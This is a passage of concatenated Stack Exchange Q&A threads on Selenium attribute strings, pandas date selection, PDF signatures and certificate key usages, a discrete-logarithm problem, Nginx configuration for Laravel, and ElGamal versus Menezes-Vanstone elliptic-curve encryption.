columns as x and y axis","dup_signals":{}},"subset":"stackexchange"} +{"text":"Selenium (C#) - How to get a string of the elements attributes\n\nQuestion: Is there a way to get a string of all the attributes that are within a particular element?\nFor example, let's say my element is the following in the webpage:\n<code><input id=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\">\n<\/code>\nIf it possible to get a string variable from this where it would have the attribute names and their values all in one string?\nComment: With your given example, what is your expected string?\nComment: The string that I was hoping to get was something like this:\nid=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\"\nComment: Using javascript executor with the following query: Element.outerHTML\nComment: What is your exact business case? Why are you looking for `id=\"SandBox1\" checked=\"\" class=\"float_right red white_stripes\" value =\"654288\"` dropping the `` tag?\nComment: @DebanjanB Well, the issue that I'm having is trying to find out if a particular attribute in the tag is present. And based on if it is present, I would like to perform a certain action that would follow different logic then if it wasn't there.\nAnswer: Below code should do that for you.\n<code>IJavaScriptExecutor js = (IJavaScriptExecutor)driver;\nvar elem = driver.FindElement(By.Id(\"SandBox1\"));\n\nstring attributes = (string)js.ExecuteScript(\"var re = \/<[^ ]+([^>]+)\/i; return re.exec(arguments[0].outerHtml)[1];\", elem);\n<\/code>\nBut it would in cases where attributes also have a <code>><\/code> in the value\nComment: I think this is what I'm looking for, but I ran it a couple of times and the string keeps coming up null. I'll keep experimenting with it though and get back to you on this.\nComment: can you try replacing `outerHtml` with `outerHTML`?\n","meta":{"source":"stackoverflow","title":"Selenium (C#) - How to get a string of the elements attributes","dup_signals":{}},"subset":"stackexchange"} +{"text":"How the \"top 2% this week\" was calculated?\n\nQuestion: I've got \"top 2% this week\" on the Raspberry Pi community. I've read some posts about what does top x% this week means and I don't find the answer to this question.\nIn addition, on Raspberry Pi User Reputation League, my account is the first one this week.\nHow this 2% was calculated?\nAnswer: \nHow this 2% was calculated?\n\nThe reputation points you accrued during that time period.\nComment: Thank you for your attention and your response. Now I got that the less the number, the better the rank.\n","meta":{"source":"raspberrypi.meta.stackexchange","title":"How the \"top 2% this week\" was calculated?","dup_signals":{}},"subset":"stackexchange"} +{"text":"I have a table with a time index. I want to choose from it only some of the days that are not continuous I did so and did not work\n\nQuestion: that is my date I want to choose\n<code>myDates=['2021-02-24', '2021-02-26','2021-02-27', '2021-03-06', '2021-04-4', '2021-04-05', '2021-04-06',\n '2021-04-07', '2021-04-08','2021-04-13', '2021-04-14', '2021-04-15', '2021-04-16','2021-04-17',\n '2021-04-22','2021-04-23', '2021-04-28', '2021-04-29', '2021-04-30', '2021-05-02', '2021-05-03',\n '2021-05-04' ,'2021-05-05', '2021-05-06', '2021-05-08']\n<\/code>\nchange them to date time\n<code>myDates=pd.to_datetime(myDates)\n<\/code>\nand trying to use <code>.loc<\/code> function\n<code>df1=df.loc[myDates]\n<\/code>\nI get that message\n\n'Passing list-likes to .loc or [] with any missing labels is no longer supported, see https:\/\/pandas.pydata.org\/pandas-docs\/stable\/user_guide\/indexing.html#deprecate-loc-reindex-listlike'\nComment: also post some samples from your df\/\nAnswer: in regards to your issue, you're trying to apply a pandas operation on a list, that won't work. you first need to create a pandas object.\nuse a boolean filter in a dataframe and <code>diff()<\/code>\nassuming your dataframe looks like this :\n<code>myDates=['2021-02-24', '2021-02-26','2021-02-27', '2021-03-06', '2021-04-4', '2021-04-05', '2021-04-06', '2021-04-07', '2021-04-08','2021-04-13', '2021-04-14', '2021-04-15', '2021-04-16','2021-04-17', '2021-04-22','2021-04-23', '2021-04-28', '2021-04-29', '2021-04-30', '2021-05-02', '2021-05-03', '2021-05-04' ,'2021-05-05', '2021-05-06', '2021-05-08']\n\nmyDates=pd.to_datetime(myDates)\n<\/code>\n\n<code>df = pd.DataFrame(myDates)\nprint(df.head(5))\n 0\n0 2021-02-24\n1 2021-02-26\n2 2021-02-27\n3 2021-03-06\n4 2021-04-04\n<\/code>\n\n<code>df[df[0].diff().gt('1 days')]\n\n 0\n1 2021-02-26\n3 2021-03-06\n4 2021-04-04\n9 2021-04-13\n14 2021-04-22\n16 2021-04-28\n19 2021-05-02\n24 2021-05-08\n<\/code>\n\n<code>print(df.assign(diff=df[0].diff()))\n\n 0 diff\n0 2021-02-24 NaT\n1 2021-02-26 2 days\n2 2021-02-27 1 days\n3 2021-03-06 7 days\n4 2021-04-04 29 days\n5 2021-04-05 1 days\n6 2021-04-06 1 days\n7 2021-04-07 1 days\n8 2021-04-08 1 days\n9 2021-04-13 5 days\n10 2021-04-14 1 days\n11 2021-04-15 1 days\n12 2021-04-16 1 days\n13 2021-04-17 1 days\n14 2021-04-22 5 days\n15 2021-04-23 1 days\n16 2021-04-28 5 days\n17 2021-04-29 1 days\n18 2021-04-30 1 days\n19 2021-05-02 2 days\n20 2021-05-03 1 days\n21 2021-05-04 1 days\n22 2021-05-05 1 days\n23 2021-05-06 1 days\n24 2021-05-08 2 days\n<\/code>\nComment: firs of all thank you for your responses . but what i want to do is to choose that specific dates (myDates) from the bigger df that contain the info i need. the bigger df have time index from 2021-02-24 to the 2021-05-10 so i want to separate that times to a new dataframe\nComment: @ImriZadak please see [mcve] and [ask] you need to provide a proper example.\n","meta":{"source":"stackoverflow","title":"I have a table with a time index. I want to choose from it only some of the days that are not continuous I did so and did not work","dup_signals":{}},"subset":"stackexchange"} +{"text":"What security do digital signatures provide (like used when signing PDFs)?\n\nQuestion: I want to ask you one question about digital signatures as they are (for example) used when digitally signing PDFs.\nWe know that if our document has a digital signature, we can detect if the original document has been altered or not. And if we want to prove owner identity, we use digital signatures.\nOn the other hand, it's very simple to remove a certificate from the document, and change it (because the document itself will not be altered, due to the certificate not being in the byte range of which the hash is encrypted as a digital signature). \nSo, what security do digital signatures provide (to - for example - PDFs)? Or am I missing something?\nAnswer: You've stumbled on the requirement for authentication.\nRecall that signature schemes have a private key and a public key. The private key is used to sign the document in question, and the public key is given to the verifying party so that they can verify that the signature is correct.\nYou're correct that it is possible to strip a digital signature and replace it with a fake one from, say, a different key. To defeat this, the verifying party needs to check that it has the correct public key to verify the signature. For example, the signer might coordinate with the verifying party a week ahead of time, in real life, and exchange keys physically (here, you could use some form of ID as authentication, since IDs include pictures). Or they might take the SSL route and use third-party certificate authorities. At any rate, they need some way to obtain the correct public key.\nThen, if a man-in-the-middle attacker has replaced the signature with a fake one from the wrong key, when the verifying party attempts to verify the signature against their known-good public key, the verification will fail. The point here is that only the (proper) signing party knows the private key associated with the known-good public key, so only the signing party can generate an authenticate signature that will match that public key.\nThus, simply checking that a digital signature is present is not enough; one needs to computationally verify that the signature is correct using an authenticated public key, i.e. one that the verifying party knows for sure is \"owned\" by the alleged signer.\n","meta":{"source":"crypto.stackexchange","title":"What security do digital signatures provide (like used when signing PDFs)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Difference between certificates with \"extension fields\" and \"Non Repudiation\" usage\n\nQuestion: For example we have two certificate pairs:\n\nFirst pair:\n\nServer cert with \"Non Repudiation\" (sometimes called Content Commitment) usage,\nClient cert without any \"extension fields\".\n\nSecond pair:\n\nServer cert with \"TLS Web Server Authentication\" usage,\nClient cert with \"TLS Web Client Authentication\" usage.\n\nBoth clients can authenticate against server. But what is the difference between all these methods? Does certificate with \"Non Repudiation\" usage allow to authenticate all clients with\/without \"TLS Web Client Authentication\" usage?\nBut \"TLS Web Server Authentication\" without \"Non Repudiation\" allows to auth clients only with \"TLS Web Client Authentication\" usage?\nIs it correct?\nComment: What is the real question here? You need to be a little more specific. Thanks!\nAnswer: The extensions are only some kind of policy meta-data attached to the certificate. Technically, no matter the extensions, a certificate remains the same thing: a file linking a key to an identity. Its information could be used for any purpose: authenticating a server, a client, signing other certificates, signing emails, signing software\/driver code, etc.\nThat's where extensions enters into play: they tell the application which usages are applicable to this certificate, so that when the application encounters the certificate in an unauthorized context it could (or must, depending if the usage is set to critical or not) consider the certificate as invalid and refuse it.\nHowever, this check must be done at the application level. A poorly implemented application may not check these usages properly and accept any certificate at any time.\nAlso, few supplementary things must be noted:\n\nThese extension are only restriction. A certificate with no extension is allowed to be used in any role (no usage limitation), while a certificate containing some extension is restricted to the usage defined by these extensions,\nTheses extension are actually divided in two main parts (plus one merely hstorical):\n\nThe key usage (like \"Non-repudiation\" in you example) defines lower-level cryptography usage allowed for this certificate,\nThe extended key usage provides a higher level usage authorized for this certificate (\"TLS Web Server Authentication\" and \"TLS Web Client Authentication\" in your examples).\nSome applications also handle what's called Netscape Cert Type, it can be seen as the precursor of the extended key usages and gather usages such as \"SSL Server\", \"SSL Client\", etc.\n\nAll of these key usages may be associated and used in a complementary way.\nSome extension might be flagged as \"critical\": this flag determine how an application not recognizing \/ having not implemented a specific extension must handle the certificate. Under such situation, if the \"critical\" flag is enabled the application must reject the certificate, when this flag is not set the application may still accept the certificate.\n\nExtended key usages names (as well as Netscape cert type) are rather straightforward to understand. Key usages however deeply depend on how the protocol (in case of a network communication) will use the certificates. Commonly found key usages for a SSL\/TLS client\/server application are the following ones:\n\nServer: Digital Signature, Non Repudiation, Key Encipherment,\nClient: Digital Signature, Key Encipherment, Data Encipherment.\n\nSo, to answer to your edited questions:\n\nDoes certificate with \"Non Repudiation\" usage allow to authenticate all clients with\/without \"TLS Web Client Authentication\" usage?\nBut \"TLS Web Server Authentication\" without \"Non Repudiation\" allows to auth clients only with \"TLS Web Client Authentication\" usage?\n\nThe \"Non Repudiation\" usage from the server's certificate will be mostly checked by client software, not by the server, and it will have no impact on the way the server will validate client's certificates.\n\"TLS Web Client Authentication\" usage will prevent client's certificates from being used in a server context. It's absence will not block any authentication. However, if a client tries to authenticate using a certificate without this usage but with \"TLS Web Server Authentication\" instead then the authentication will most likely be refused by the server.\n","meta":{"source":"security.stackexchange","title":"Difference between certificates with \"extension fields\" and \"Non Repudiation\" usage","dup_signals":{}},"subset":"stackexchange"} +{"text":"Common exponent problem related to discrete logarithms assuming Diffie Hellman oracle\n\nQuestion: Let $g$ be a generator of multiplicative group mod $p$ a prime.\nSuppose we know\n$$g^{a+km_1}\\bmod p$$\n$$g^{b-km_2}\\bmod p$$\n$$g^{a+k'm_3}\\bmod p$$\n$$g^{b-k'm_4}\\bmod p$$\nwhere $m_2m_3-m_4m_1=\\phi(p)$ where $\\phi$ is Totient and $a,b,k,k'$ are the only unknown and all of $a$ through $m_4$ are of size $\\sqrt p$ (we know $m_1$ through $m_4$ over $\\mathbb Z$) can we identify $g^a$, $g^b$ in polynomial time?\nWe are allowed to assume a Diffie Hellman oracle?\nComment: Is this a homework assignment? Or, is this a 'hard problem' you came up with when analyzing a crypto protocol?\nComment: It is a hard problem... I am unable to make progress. I do not know if it has a solution.\nComment: hard problem == Homework assingment?\nComment: \"I do not know if it has a solution\" == research.\nAnswer: Well, one obvious observation is that, if we call the four revealed values $C_1, C_2, C_3, C_4$ (so $C_1 = g^{a+km_1}$), then:\n$$C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1} = (g^a)^{m_2-m_4} \\cdot (g^b)^{m_3-m_1}$$\nThis can be used to distinguish a guess of $g_a, g_b$ from the correct values; hence if \"can we identify\" means \"distinguish\", then yes, we can do that.\nI don't know if there is a way to add a second observation which would allow you to recover the $g^a, g^b$ values.\nComment: That's a necessary condition on $g^a$ and $g^b$, but not a sufficient one. For example the pair $g^{a+m_3-m_1}$ and $g^{b-m_2+m_4}$ would also pass this test.\nComment: What if we assume DH oracle? I think it may not be necessary though.\nComment: @Turbo A DH oracle will not change the fact that there is a large family of solutions that pass poncho's test and any other test that relies on exponentiating and multiplying the $C_i$. Indeed this family allows us to take any arbitrary value for $g^a$ and find putative values for $g^b$, $g^k$ and $g^{k'}$ that pass all such tests.\nComment: @DanielS But DH operations are not BB.. so may be there is hope?\nComment: I think it should be $C_1^{m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{m_1} = (g^a)^{m_2+m_4} \\cdot (g^b)^{m_3+m_1}$ in Poncho's approach. Or else the problem gets trivially solved.\nComment: @DanielS It is unclear to me why DH cannot give benign relations as in Poncho's errored identity. Following works if Poncho's identity held.\nComment: $$C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1} = (g^a)^{m_2-m_4} \\cdot (g^b)^{m_3-m_1}\\equiv(g^a)^{m_2-m_4} \\cdot (g^{bm_1})^{\\frac{m_3-m_1}{m_1}}$$\n$$\\equiv(g^a)^{m_2-m_4} \\cdot (g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\cdot (g^{-am_2})^{\\frac{m_3-m_1}{m_1}}$$\n$$\\equiv(g^a)^{m_2-m_4-m_2\\frac{m_3-m_1}{m_1}} \\cdot (g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\bmod p$$\n\n$$\\implies g^a\\equiv\\Big((C_1^{-m_4} \\cdot C_2^{m_3} \\cdot C_3^{m_2} \\cdot C_4^{-m_1})\\cdot(g^{am_2+bm_1})^{\\frac{m_3-m_1}{m_1}}\\Big)^{\\frac1{m_2-m_4-m_2\\frac{m_3-m_1}{m_1}}}\\bmod p$$\nComment: @poncho Perhaps DH can give identities which help.\nComment: The point here is that your first five equations give a system of four unknowns with three constraints so that there is an infinite family of solutions to the five equations. A DH oracle will allow you to form polynomial identities rather than just linear identities, but if the identities are based on the system of five equations all non-causal solutions will also satisfy them.\nComment: @DanielS I see. What do you mean by non-causal solutions?\nComment: @DanielS also note given $a+km$ we can get $a$ through modular arithmetic.. but here we have $g^{a+km}\\bmod p$.\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackexchange.com\/rooms\/134667\/discussion-between-daniel-s-and-turbo).\nAnswer: I think not. If we could extend such a construction to black box group, it would give a $q^{1\/4}$ method for solving discrete logarithms in that group. Also note that if the size constraint on $a$, $b$, $k$ and $k'$ is removed, the problem is not well-defined (there may be multiple solutions even in the constrained case; I'm not sure).\nMultiple solutions if size constraints are ignored\nGenerically we can consider this isomorphic to a linear algebra problem in the exponents. We write $c_1=a+km_1$, $C_i=g^c_i\\mod p$ and so forth. By multiplying terms $C_iC_j$ or exponentiating terms $C_i^d$ we can add $c_i+c_j$ or multiply our unknown exponents by constants $dc_i$, so that we can find $g^x$ where $x$ is an arbitrary linear combinations of these $c_i$ (a Diffie-Hellman oracle would allow us to form $g^y$ where $y$ is an arbitrary polynomial expressions in the $c_i$). Restricting ourselves to such linear combinations (as would be the case for a black box group), the problem becomes to find a linear combination of our $c_i$ that is equal to $a$ or $b$.\nWe have the system\n$$\\left(\\matrix{1&0&m_1&0\\\\ 0&1&0&-m_2\\\\ 1&0&m_3&0\\\\ 0&1&0&-m_4}\\right)\\left(\\matrix{a\\\\ b\\\\ k\\\\ k'}\\right)=\\left(\\matrix{c_1\\\\ c_2\\\\c_3\\\\c_4}\\right)\\pmod{\\phi(p)}$$\nif we write $M$ for the 4x4 matrix and $\\mathbf c$ for the right hand vector, we might hope to find our linear combination from $M^{-1}\\mathbf c$. However we see that\n$$\\mathrm{det}(M)=m_1m_4-m_2m_3\\equiv 0\\pmod{\\phi(p)}$$\nso that our matrix is not invertible.\nHigh school linear algebra now tells us that we either have no solutions or many solutions. The fact that our construction defines one solution tells us that there are many solutions. A little row reduction tells us that $m_2c_1+m_1c_2-m_3c_3-m_1c_4\\equiv 0\\pmod{\\phi(p)}$. In particular then if e.g. $m_1$ is coprime to $\\phi(p)$, we can determine $C_4$ given $C_1$, $C_2$ and $C_3$ and so the 4th equation grants us no additional information. In the absence of further degeneracy, it follows that we can, for example, choose an arbitrary $g^a$ and then find $g^k\\equiv(C_1\/g^a)^{1\/m_1}\\pmod p$, $g^b\\equiv C_2(g^k)^{m_2}\\pmod p$ and $g^{k'}\\equiv(C_3\/g^a)^{1\/m_3}$ that produce the $C_1$, $C_2$, $C_3$ and $C_4$ that we are presented with. However, the $a$, $b$, $k$ and $k'$ associated with these will not necessarily meet the size constraints.\nA no-go in the black box model\nNow suppose that we can extended such a solver to a black box multiplicative group. Suppose that we are given a discrete logarithm problem for the generator $g$ of order $q$ and the element $C_1$ is such a group. We choose an arbitrary $m_1$ and by a counting argument there is a strong probability that $c_1$ can be written in the form $c_1\\equiv a+km_1\\pmod q$ with $a,k\\le q^{1\/2}$. Write $d=[q^{1\/2}]$. We now call our solver with $C_1=C_1$, $C_2=g^d\/C_1$, $C_3=C_1g^{m_1}$ and $C_4=g^d\/C_3$ and $m_1=m_2=m_3=m_4$ (corresponding to the values $b=d-a$ and $k'=k+1$ which satisfy the size constraints). Our solver will return $g^a$ from which we can recover $a$ using the baby-steps\/giant-steps method in $O(\\root 4\\of q)$ steps. Similarly we can recover $g^k=(C_1\/g^a)^{1\/m_1}$ and $k$ in another $O(\\root 4\\of q)$ steps. This allows us to compute $c_1$ with $O(\\root 4\\of q)$ group operations which is not possible for a black box group.\nComment: Yes, $\\sqrt q$ is possible to compute $c_1$, but $\\root 4\\of q$ is not. Recall that $c_1$ is arbitrary and we have a contradiction.\nComment: What is $C_1$ and what is $c_1$? Are they same?\nComment: @Turbo as in the first part $C_1=g^c_1\\mod p$. The argument does not preclude some use of the structure of $\\mathbb Z\/p\\mathbb Z$, but does mean that to recover $g^a$ we must do something other than raise the $C_i$ to powers and multiply.\nComment: You could use the general number field sieve to recover $c_1$ (not polynomial time, but certainly subexponential) and then use lattice basis reduction to find $a, k\\approx\\sqrt p$ such that $a+km_1\\equiv c_1\\pmod p$.\nComment: $m_1m_4-m_2m_3=0$ here and not $\\lambda(p)$.\nComment: Is $\\neq\\lambda(p)$ an issue to the lower bound you are proving?\nComment: The condition $m_1m_4-m_2m_3\\equiv 0\\pmod{\\phi(p0}$ includes the case $m_1m_4-m_2m_3=\\phi(p)=\\lambda(p)$ and so all of the above still stands in the specific case.\nComment: Yes agree. But in your situation $m_1=\\dots=m_4$ provides $m_1m_4-m_2m_3=0$ exactly while I require $\\lambda(p)$ exactly. $m_1m_4-m_2m_3=0\\implies m_1m_4-m_2m_3\\equiv0\\bmod\\lambda(p)$ but not $m_1m_4-m_2m_3=\\lambda(p)$.\nComment: the black box lower bound works only if you work with group elements mod p. But a,k are not group elements mod p.\nComment: I think the bb lower bound is invalid. You are getting the final exponent through intermediate objects which are a,k and these are not group elements mod p. Refer https:\/\/crypto.stackexchange.com\/questions\/99282\/does-generic-group-black-box-model-prohibit-msb-of-discrete-logarithm?noredirect=1&lq=1 where instead of a,k we employ man which is not group element mod p. Can you double check and compare with msb answer to tell what is different?\nComment: I don't think anything is different: a putative algorithm to solve MSB of the discrete logarithm of a BB group is not possible as it would beat the $q^{1\/2}$ bound, likewise a putative algorithm to solve your problem in a BB group is not possible as it too would beat the $q^{1\/2}$ bound.\nComment: The point made there is MSB is not BB box group element. Likewise in here a,k are not BB box group elements. Are you certain of your bound?\nComment: MSB, $a$ and $k$ are all defined as components of the index of a cyclic group element and so all exist in the black box context.\nComment: then what is the point made there? I don't get it. It says going through msb is in play because msb is not a group element.\nComment: The point here is that just as the MSB oracle does not exist for a BB group, an oracle for your problem does not exist for a BB group.\nComment: Is the BB lower bound only for deterministic algorithms or does it apply to randomized algorithms as well?\n","meta":{"source":"crypto.stackexchange","title":"Common exponent problem related to discrete logarithms assuming Diffie Hellman oracle","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel with Nginx parameters are empty\n\nQuestion: I just set up Nginx, and I'm trying to use it to host a Laravel app, but I ran into 2 problems.\n\nFor GET method, I always get an extra parameter in my inputs.\n\nUsing PostMan (Chrome) to do my testings, I set the destination URL and my desired parameters and send the request. The output that I get, it always includes the <code>REQUEST_URI<\/code> which it shouldn't. Example output:\n\n.\n<code>Array (\n [\/api\/user] => \/\/ This shouldn't be here\n [test] => test\n)\n<\/code>\n\nMy parameters (the above) will NOT show for DELETE or PUT, at all, and for POST I'll only get the <code>REQUEST_URI<\/code>\n\nNginx vhost (Followed Setting up Laravel w\/ Nginx)\n<code>server {\n server_name local.test.com;\n root \/var\/www\/test\/public;\n\n location \/ {\n index index.php index.html index.htm;\n }\n\n # serve static files directly\n location ~* \\.(jpg|jpeg|gif|css|png|js|ico|html)$ {\n access_log off;\n expires max;\n }\n\n # removes trailing slashes (prevents SEO duplicate content issues)\n if (!-d $request_filename) {\n rewrite ^\/(.+)\/$ \/$1 permanent;\n }\n\n # unless the request is for a valid file (image, js, css, etc.), send to bootstrap\n if (!-e $request_filename) {\n rewrite ^\/(.*)$ \/index.php?\/$1 last;\n break;\n }\n\n # catch all\n error_page 404 \/index.php;\n\n # The PHP Inclusion Block\n # include \/etc\/nginx\/includes\/php;\n location ~ \\..*\/.*\\.php$ {\n # I'm pretty sure this stops people trying to traverse your site to get to other PHP files\n return 403;\n }\n\n #location ~ \\.php$ {\n location ~ \\.php(.*)$ {\n try_files $uri =404;\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n include \/etc\/nginx\/fastcgi_params;\n }\n\n# Deny Any Access to .htaccess Files That May Be Present (not usually in issue in Laravel)\n# include \/etc\/nginx\/includes\/deny_htaccess;\nlocation ~ \/\\.ht\n{\n deny all;\n}\n\n error_log \/var\/www\/logs\/test-error.log;\n}\n<\/code>\nfastcgi_params :\n<code>fastcgi_param QUERY_STRING $query_string;\nfastcgi_param REQUEST_METHOD $request_method;\nfastcgi_param CONTENT_TYPE $content_type;\nfastcgi_param CONTENT_LENGTH $content_length;\n\nfastcgi_param SCRIPT_FILENAME $request_filename;\nfastcgi_param SCRIPT_NAME $fastcgi_script_name;\nfastcgi_param REQUEST_URI $request_uri;\nfastcgi_param DOCUMENT_URI $document_uri;\nfastcgi_param DOCUMENT_ROOT $document_root;\nfastcgi_param SERVER_PROTOCOL $server_protocol;\n\nfastcgi_param GATEWAY_INTERFACE CGI\/1.1;\nfastcgi_param SERVER_SOFTWARE nginx\/$nginx_version;\n\nfastcgi_param REMOTE_ADDR $remote_addr;\nfastcgi_param REMOTE_PORT $remote_port;\nfastcgi_param SERVER_ADDR $server_addr;\nfastcgi_param SERVER_PORT $server_port;\nfastcgi_param SERVER_NAME $server_name;\n\n#fastcgi_param HTTPS $https;\n\n# PHP only, required if PHP was built with --enable-force-cgi-redirect\nfastcgi_param REDIRECT_STATUS 200;\n\nfastcgi_connect_timeout 60;\nfastcgi_send_timeout 180;\nfastcgi_read_timeout 180;\nfastcgi_buffer_size 128k;\nfastcgi_buffers 4 256k;\nfastcgi_busy_buffers_size 256k;\nfastcgi_temp_file_write_size 256k;\nfastcgi_intercept_errors on;\n<\/code>\nnginx.conf Has only 1 thing changed, and that is <code>keepalive_timeout<\/code> from 65 to 15\nSo I absolutely have no clue, where all this thing goes wrong. But I do have to mention, that on another 2 environments that I have (One with Lighttpd and the other with Apache2) the app works perfectly.\nFrom what I've noticed, its all reduced to the following code:\n<code># unless the request is for a valid file (image, js, css, etc.), send to bootstrap\nif (!-e $request_filename) {\n rewrite ^\/(.*)$ \/index.php?\/$1 last;\n break;\n}\n<\/code>\nWhich will make the GET work... and add the additional parameter\nAnswer: It is best to avoid unneccessary rewrites in your nginx configuration (See Nginx Pitfalls), one in particular is the one responsible for passing the request to the Laravel front controller:\nAll you need for Laravel is:\n<code>location \/ {\n index index.php index.html index.htm;\n try_files $uri $uri\/ index.php?$query_string;\n}\n<\/code>\nFirst that tries to access a file directly, then a directory, and if neither exists it passes the request to index.php. <code>$query_string<\/code> is important to pass along as that will contain the <code>$_GET<\/code> data that otherwise gets lost.\nAnd here is my own FastCGI configuration piece:\n<code>location ~ \\.php$ {\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n fastcgi_param SCRIPT_FILENAME $document_root\/$fastcgi_script_name;\n include fastcgi_params;\n}\n<\/code>\nAs for unexpected input, it could be the way your current rewrite works, but to say for sure, what are you outputting?\nComment: `dd(Input::all());` it's what I'm outputting... and no, it's not `Input::all()` that set the undesired parameter\nComment: Alright. Try the suggested configuration and tell me if it does it.\nComment: Just tried it, by commenting the `if`s containing a rewrite rule, and now I get no output of my parameters at all\nComment: Thanks for the help, but your conf is no of a help to me.\nComment: Have you replaced the part that you describe as \"its all reduced to the following code\" with my suggested code? I'm just not sure if that was clear\nComment: Your suggested code regards anything ending in `.php` and accesing document root. even though, I do have tried your sugested code,and as mentioned, doesn't work\nAnswer: This works for me:\n<code>location \/ {\n index index.php;\n try_files $uri $uri\/ \/index.php?q=$uri&$args;\n}\n\nlocation ~ \\.php$ {\n\n include fastcgi_params;\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index index.php;\n\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_param PATH_INFO $fastcgi_path_info;\n fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;\n fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\n\n}\n<\/code>\nComment: I don't think Laravel expects a `q` parameter, have not seen it before. But saw it in CI\nComment: Yes, I've tested it without `q` and it works fine. So `try_files $uri $uri\/ \/index.php?$args;` works.\nAnswer: From your config:\n<code>rewrite ^\/(.*)$ \/index.php?\/$1 last;\n<\/code>\nhere you have a redirect to <code>\/index.php?\/$1<\/code> (e.g. <code>\/index.php?\/some\/path<\/code>).\n<code>fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n<\/code>\nand here you spilt path by <code>^(.+\\.php)(\/.+)$<\/code> regex (e.g. <code>\/index.php\/some\/path<\/code>).\nHave you noticed the difference?\nComment: I actually removed the `fastcgi_spli` part and now I get the parameters, but I still have the `[\/api\/user] => \/\/ This shouldn't be here` problem\nComment: I followed http:\/\/stackoverflow.com\/questions\/8856664\/setting-up-laravel-w-nginx and just addapted a little bit\nComment: But you have configured nginx that way. Your `rewrite ^\/(.*)$ \/index.php?\/$1 last;` is responsible for adding the path to the parameters.\nComment: please forgive my ignorance, but how else should I do it? That's what all the result I've seen on Google (searching `laravel nginx`) suggests.\nComment: You should do it the way that you want. Nginx has a very flexible configuration language, that allows to configure any desired behaviour. I suggest you to read the documentation and write your configuration from scratch. Useful links: http:\/\/nginx.org\/en\/docs\/ and http:\/\/wiki.nginx.org\/Pitfalls\nComment: Sorry, I cannot help because even don't know what `laravel` is, but it is clear to me that the example of configuration you have found is poorly written, probably by the person with a little knowledge of nginx.\nAnswer: I was facing similar issue and I fixed it with following configs:\n<code>server {\n listen 80;\n server_name subdomain.domain.com;\n root \/var\/www\/dir\/public;\n\n charset utf-8;\n\n location = \/favicon.ico { access_log off; log_not_found off; }\n location = \/robots.txt { access_log off; log_not_found off; }\n\n access_log off;\n error_log \/var\/log\/nginx\/registration.app-error.log error;\n error_page 404 \/index.php;\n sendfile off;\n\n # Point index to the Laravel front controller.\n index index.php;\n\n location \/ {\n # try_files $uri $uri\/ index.php?$query_string;\n try_files $uri $uri\/ \/index.php?&$args;\n }\n\n location ~ \\.php$ {\n include snippets\/fastcgi-php.conf;\n #\n # # With php7.0-cgi alone:\n # fastcgi_pass 127.0.0.1:9000;\n # # With php7.0-fpm:\n fastcgi_pass unix:\/run\/php\/php7.2-fpm.sock;\n }\n\n location ~ \/\\.ht {\n #deny all;\n }\n}\n<\/code>\nComment: The only one that worked for me, critical bit was `index.php?&$args;`, running Laravel 4.2 and php7.0 on debian 9.6\nAnswer: This is a configuration that works for me with NGINX and Laravel\n<code>server {\n\n listen 80;\n server_name sub.domain.com;\n set $root_path '\/var\/www\/html\/application_name\/public';\n root $root_path;\n\n index index.php index.html index.htm;\n\n try_files $uri $uri\/ @rewrite;\n\n location @rewrite {\n rewrite ^\/(.*)$ \/index.php?_url=\/$1;\n }\n\n location ~ \\.php {\n\n fastcgi_pass 127.0.0.1:9000;\n fastcgi_index \/index.php;\n\n include \/etc\/nginx\/fastcgi_params;\n\n fastcgi_split_path_info ^(.+\\.php)(\/.+)$;\n fastcgi_param PATH_INFO $fastcgi_path_info;\n fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;\n fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\n }\n\n location ~* ^\/(css|img|js|flv|swf|download)\/(.+)$ {\n root $root_path;\n }\n\n location ~ \/\\.ht {\n deny all;\n }\n\n}\n<\/code>\nAnswer: Same issue fixed as described in NGINX documentation: Embedded Variables: $is_args\nAdd this in NGINX location:\n<code>location \/ {\n try_files $uri $uri\/ \/index.php$is_args$args;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Laravel with Nginx parameters are empty","dup_signals":{}},"subset":"stackexchange"} +{"text":"What differences between Menezes\u2013Vanstone ECC and ElGamal ECC?\n\nQuestion: After researching ECC encryption, I found that we can use ElGamal cryptosystem with elliptic curve and can we use Menezes-Vanstone cryptosystem with elliptic curve. What is the essential difference between the two systems? Which one is better with regards to complexity\/performance?\nComment: If you want practical ECC encryption, use ECIES. It's simple and offers strong security.\nAnswer: The essential difference between these two encryption schemes is that for standard ElGamal encryption on elliptic curves the plaintext space is the set of points in your elliptic curve group while in Menezes-Vanstone (which can be considered as a variant of ElGamal) the plaintext space is $F_p^*\\times F_p^*$ where $F_p$ is the field over which your curve is defined. So what does this mean?\nThis means that when using ElGamal over elliptic curves you have to map the message to an elliptic curve point before encryption, while when using Menezes-Vanstone you can take your message string, split it up into to halves and interpret these two strings as elements of $F_p$ each.\nAlternatively, you can use other \"encoding free\" variants of ElGamal such as \"hashed ElGamal\" that avoid the task of mapping \nmessages to points on the curve. In standard ElGamal on elliptic curves you would compute \nthe ciphertext as $(C_1,C_2)=(kP,M+kY)$ where $k$ is a random integer, $M$ the message $m$ \nmapped to a point on the curve, $Y$ the public key and $P$ the generator point.\nIn hashed ElGamal, the ciphertext is $(C_1,C_2)=(kP,m\\oplus H(kY))$ where $H:G\\rightarrow \\{0,1\\}^n$ \nis a hash function that maps points on the curve to 